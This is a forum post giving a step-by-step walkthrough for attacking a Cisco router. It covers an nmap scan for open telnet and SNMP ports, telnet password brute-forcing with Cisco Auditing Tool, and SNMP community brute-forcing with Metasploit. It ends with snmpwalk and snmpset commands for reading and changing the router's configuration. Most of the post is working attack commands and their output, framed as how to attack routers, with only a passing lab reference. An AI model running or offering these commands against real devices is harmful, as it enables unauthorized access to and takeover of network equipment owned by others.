Simple Attack Router Cisco

This topic contains 0 replies, has 1 voice, and was last updated by  hackersmooth88 3 years, 1 month ago.

  • Author
    Posts
  • #8883
     hackersmooth88 
    Participant

    Hello Anybody,

    I want to share about How to simple attack Router, maybe in case Router Cisco

    First we must scanning with nmap : we can combine attack TCP and UDP..

    We hope router open remote access (tcp) and snmp in port (udp)

    Use Backtrack or Kali Linux :
    nmap -sS -sU -T5 192.168.2.1

    29954U@root:/pentest/cisco$ nmap -sS -sU -T5 192.168.2.1

    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-05-12 09:04 EDT
    Warning: 192.168.2.1 giving up on port because retransmission cap hit (2).
    Nmap scan report for 192.168.2.1
    Host is up (0.0022s latency).
    Not shown: 1248 closed ports, 749 open|filtered ports
    PORT STATE SERVICE
    23/tcp open telnet
    79/tcp open finger
    161/udp open snmp
    MAC Address: 00:02:FD:60:77:20 (Cisco Systems)

    and then you can see port 23/tcp and 161/udp is open, so we can attack now

    Telnet : We can bruteforce using hydra or cisco tools

    29954U@root:/pentest/cisco/cisco-auditing-tool$ ./CAT -h 192.168.2.1 -w /pentest/passwords/john/password.lst

    Cisco Auditing Tool – g0ne [null0]

    Checking Host: 192.168.2.1

    Guessing passwords:

    Invalid Password: cisco
    Invalid Password: ciscos
    Invalid Password: cisco1
    Invalid Password: router

    now you can attack snmp to bruteforce with msfconsole :

    msf > use auxiliary/scanner/snmp/snmp_login
    msf auxiliary(snmp_login) > set RHOSTS 192.168.2.1
    rhosts => 192.168.2.1
    msf auxiliary(snmp_login) > set THREADS 3
    threads => 3
    msf auxiliary(snmp_login) > exploit

    if success you can see community to read and write…

    You can command

    snmpwalk -mALL -v1 -c public 192.168.2.1

    or if you must exploit you can change with

    snmpset -c ILMI -v 2c 192.168.2.1 1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1

    All techniq about change you can see in wiki snmpset

    Detail Lab : hackingdojo.com

You must be logged in to reply to this topic.

Copyright ©2019 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?